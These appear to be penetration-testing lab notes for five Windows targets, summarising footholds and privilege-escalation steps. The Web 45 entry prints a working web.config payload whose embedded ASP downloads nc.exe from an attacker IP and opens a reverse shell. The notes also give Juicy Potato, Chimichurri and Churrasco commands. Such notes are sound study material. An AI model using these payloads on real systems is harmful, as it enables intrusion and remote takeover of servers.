Web 5
Web 41: Adobe ColdFusion 8
Target: Windows Server 2008 R2 Standard
- Unauthenticated file upload vulnerability with the
upload.cfm script.
- Exploit DB entry:
50057
- The Python script auto-generates a
msfvenom and uploads the .jsp web shell and executes
Privilege Escalation: MS10-059
.\Chimichurri.exe <kali-ip> <kali-tcp-port>
Web 42: WebDAV RCE
Target: Windows Server 2003
Privilege Escalation: Token Impersonation
- IIS Server has
SeImpersonate which allows token impersonation
- This exploit works perfectly for the target operating system: https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
- Transfer a the exploit
- Transfer a
msfvenom reverse shell payload
- Start a listener and use the exploit to run the reverse shell payload as SYSTEM
Web 43: Custom API
Target: Windows 10 Pro 1903
- Unauthenticated user can issue a
POST request to the API
- Has an API endpoint which returns running processes
- Reveals command line parameters
- One of the command-line paramters is a base 64 encoded password and username
- This provides
SSH access to the target
Privilege Escalation: Command Execution via Privileged Web Server
- Enumerating running ports reveals an internal server on
TCP/80
- Also, found a password-protected PDF with a weak password
- Cracked with
pdf2john and john
- Revealed information about command execution via the web server
- Port forward to the local server and test it out
-
curl http://localhost:8080/?whoami
- Running as SYSTEM
- Use privileged web server to add
SSH user to local admins group
- Log out of SSH and log back in
- Use
psexec -s cmd.exe to get SYSTEM shell
Web 44: XAMPP PHP Include RFI
Target: Windows 10 Pro Build 19042
Privilege Escalation: Privileged Scheduled Task
- A task running as SYSTEM loads a file in a world-readable directory
- Create a
msfvenom payload and overwrite the task binary
- Start a listener
- Catch SYSTEM shell when task runs
Web 45: IIS File Upload Vulnerability
Target: Windows Server 2008 R2 x64
- Vulnerable server allows upload of
.config file
- Files are uploaded to globally readable directory
/uploadedfiles/
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
</fileExtensions>
<hiddenSegments>
<remove segment="web.config" />
</hiddenSegments>
</requestFiltering>
</security>
</system.webServer>
</configuration>
<%
Set objShell = CreateObject("WScript.Shell")
objShell.Exec("cmd.exe /c certutil.exe -urlcache -split -f http://10.10.14.6/nc.exe C:\Windows\Temp\nc.exe")
objShell.Exec("cmd.exe /c C:\Windows\Temp\nc.exe 10.10.14.6 443 -e C:\Windows\System32\cmd.exe")
%>
- Host
nc.exe via Python web server
- Load
web.config file: http://server-ip/uploadedfiles/web.config
- File is downloaded from attack box and payload is run
Privilege Escalation: SeImpersonatePrivilege
- User has impersonate privilege
- Windows Server 2008 R2 is vulnerable to Juicy Potato
- Create an
msfvenom privilege escalation payload
-
Download Juicy Potato binary
- Host both via Python web server and transfer to target
- Run Juicy Potato
set clsid={4991d34b-80a1-4291-83b6-3328366b9097}
.\jp.exe -p C:\Users\merlin\Desktop\privesc.exe -l 4000 -t * -c %clsid%
